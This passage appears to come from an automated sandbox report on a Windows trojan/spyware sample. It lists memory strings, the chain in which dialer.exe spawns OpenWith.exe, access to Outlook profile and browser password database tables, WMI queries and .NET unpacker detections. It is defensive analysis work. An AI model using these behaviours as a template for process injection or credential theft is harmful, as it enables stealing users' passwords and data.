                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F1158AC3_2_00007DF41F1158AC
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F1178D83_2_00007DF41F1178D8
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F07F9543_2_00007DF41F07F954
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F0577A03_2_00007DF41F0577A0
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F0717C43_2_00007DF41F0717C4
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F07C7E83_2_00007DF41F07C7E8
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F10780C3_2_00007DF41F10780C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F04D8503_2_00007DF41F04D850
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F0968343_2_00007DF41F096834
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F0878603_2_00007DF41F087860
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F04D6883_2_00007DF41F04D688
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F0CB68C3_2_00007DF41F0CB68C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F1246F83_2_00007DF41F1246F8
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F1187503_2_00007DF41F118750
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F09F4FC3_2_00007DF41F09F4FC
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F0885343_2_00007DF41F088534
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F1173A03_2_00007DF41F1173A0
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F1183B83_2_00007DF41F1183B8
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F0AA3F43_2_00007DF41F0AA3F4
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F03E4143_2_00007DF41F03E414
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F07C45C3_2_00007DF41F07C45C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F0673183_2_00007DF41F067318
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F0433143_2_00007DF41F043314
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F1241DC3_2_00007DF41F1241DC
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F1111BC3_2_00007DF41F1111BC
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F07D2103_2_00007DF41F07D210
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F1182383_2_00007DF41F118238
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F0D40A03_2_00007DF41F0D40A0
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F09B0943_2_00007DF41F09B094
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F096F783_2_00007DF41F096F78
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F086FA03_2_00007DF41F086FA0
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F10C01C3_2_00007DF41F10C01C
                      Source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000046E3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs wdeeFKntav.exe
                      Source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKernelbase.dllj% vs wdeeFKntav.exe
                      Source: wdeeFKntav.exe, 00000000.00000003.2112870082.0000000004652000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs wdeeFKntav.exe
                      Source: wdeeFKntav.exe, 00000000.00000000.2073258965.0000000000CDB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTCPZ.exe, vs wdeeFKntav.exe
                      Source: wdeeFKntav.exe, 00000000.00000003.2112932104.0000000004730000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs wdeeFKntav.exe
                      Source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs wdeeFKntav.exe
                      Source: wdeeFKntav.exe, 00000000.00000003.2113264458.00000000049C1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKernelbase.dllj% vs wdeeFKntav.exe
                      Source: wdeeFKntav.exe, 00000000.00000003.2112323721.0000000004936000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs wdeeFKntav.exe
                      Source: wdeeFKntav.exe, 00000000.00000003.2111775317.0000000004738000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs wdeeFKntav.exe
                      Source: wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs wdeeFKntav.exe
                      Source: wdeeFKntav.exe, 00000000.00000003.2112684749.000000000488D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs wdeeFKntav.exe
                      Source: wdeeFKntav.exeBinary or memory string: OriginalFilenameTCPZ.exe, vs wdeeFKntav.exe
                      Source: wdeeFKntav.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 3.3.OpenWith.exe.25b16e1aad0.2.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 3.3.OpenWith.exe.25b16e1aad0.7.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 3.3.OpenWith.exe.25b16e1aad0.10.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 3.3.OpenWith.exe.25b16e1aad0.6.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 3.3.OpenWith.exe.25b16e1aad0.5.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 3.3.OpenWith.exe.25b16e1aad0.4.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 3.3.OpenWith.exe.25b16e1aad0.3.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 3.2.OpenWith.exe.25b16e1aad0.1.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 3.3.OpenWith.exe.25b16e1aad0.0.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 3.3.OpenWith.exe.25b16e1aad0.14.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 3.3.OpenWith.exe.25b16e1aad0.8.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 3.3.OpenWith.exe.25b16e1aad0.13.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 3.3.OpenWith.exe.25b16e1aad0.16.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: classification engineClassification label: mal96.troj.spyw.evad.winEXE@5/0@0/1
                      Source: C:\Windows\SysWOW64\dialer.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
                      Source: C:\Windows\SysWOW64\dialer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\dialer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                      Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: OpenWith.exe, 00000003.00000003.2320449048.0000025B16DB7000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2322773513.0000025B16DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE sqlite_sequence(name,seq) AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)framework;
                      Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: OpenWith.exe, 00000003.00000003.2319637690.0000025B1705F000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17020000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319529034.0000025B1705F000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2330694334.0000025B17000000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2330260861.0000025B17050000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: wdeeFKntav.exeReversingLabs: Detection: 76%
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_0-1181
                      Source: unknownProcess created: C:\Users\user\Desktop\wdeeFKntav.exe "C:\Users\user\Desktop\wdeeFKntav.exe"
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeProcess created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
                      Source: C:\Windows\SysWOW64\dialer.exeProcess created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeProcess created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeProcess created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: tapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\OutlookJump to behavior
                      Source: wdeeFKntav.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: wdeeFKntav.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831L source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdb source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115365389.0000000002D10000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115429018.0000000004E30000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: wdeeFKntav.exe, 00000000.00000003.2111775317.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112323721.00000000047B0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114700103.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114865216.0000000004FA0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112684749.0000000004760000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115217738.0000000004F50000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115079095.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2111775317.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112323721.00000000047B0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114700103.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114865216.0000000004FA0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112684749.0000000004760000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115217738.0000000004F50000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115079095.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115365389.0000000002D10000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115429018.0000000004E30000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbf source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: 3.3.OpenWith.exe.25b16e1aad0.8.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.OpenWith.exe.25b16e1aad0.8.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 3.3.OpenWith.exe.25b16e1aad0.4.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.OpenWith.exe.25b16e1aad0.4.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 3.3.OpenWith.exe.25b16e1aad0.10.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.OpenWith.exe.25b16e1aad0.10.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 3.3.OpenWith.exe.25b16e1aad0.16.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.OpenWith.exe.25b16e1aad0.16.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 3.3.OpenWith.exe.25b16e1aad0.13.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.OpenWith.exe.25b16e1aad0.13.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 3.3.OpenWith.exe.25b16e1aad0.0.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.OpenWith.exe.25b16e1aad0.0.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 3.2.OpenWith.exe.25b16e1aad0.1.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.2.OpenWith.exe.25b16e1aad0.1.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 3.3.OpenWith.exe.25b16e1aad0.6.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.OpenWith.exe.25b16e1aad0.6.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 3.3.OpenWith.exe.25b16e1aad0.14.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.OpenWith.exe.25b16e1aad0.14.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 3.3.OpenWith.exe.25b16e1aad0.5.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.OpenWith.exe.25b16e1aad0.5.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 3.3.OpenWith.exe.25b16e1aad0.2.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.OpenWith.exe.25b16e1aad0.2.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 3.3.OpenWith.exe.25b16e1aad0.7.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.OpenWith.exe.25b16e1aad0.7.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 3.3.OpenWith.exe.25b16e1aad0.3.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.OpenWith.exe.25b16e1aad0.3.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: wdeeFKntav.exeStatic PE information: section name: .textbss
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_3_00CC5AF4 pushad ; retf 0_3_00CC5B03
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_3_00CC6285 push F693B671h; retf 0_3_00CC628A
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_3_00CC7C52 push dword ptr [edx+ebp+3Bh]; retf 0_3_00CC7C5F
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_3_00CC5DCE push edi; iretd 0_3_00CC5DD5
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_3_00CC2F4E push eax; retf 0_3_00CC2F4F
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_3_00CC6F48 push es; ret 0_3_00CC6F49
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_3_00CC416F push ecx; iretd 0_3_00CC417B
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_3_00CC657C push esi; ret 0_3_00CC6580
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_3_00CC412F pushad ; ret 0_3_00CC4137
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_2_00C79429 push cs; retf 0_2_00C79565
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_2_00C78964 push ebx; retf 0_2_00C78965
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_2_00C7750E push ds; iretd 0_2_00C77517
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_2_00C81269 push edx; retf 0_2_00C81422
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_2_00C7FF22 push edi; iretd 0_2_00C7FF2D
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 2_3_02723E4E push edi; iretd 2_3_02723E55
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 2_3_02725CD2 push dword ptr [edx+ebp+3Bh]; retf 2_3_02725CDF
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 2_3_02723B74 pushad ; retf 2_3_02723B83
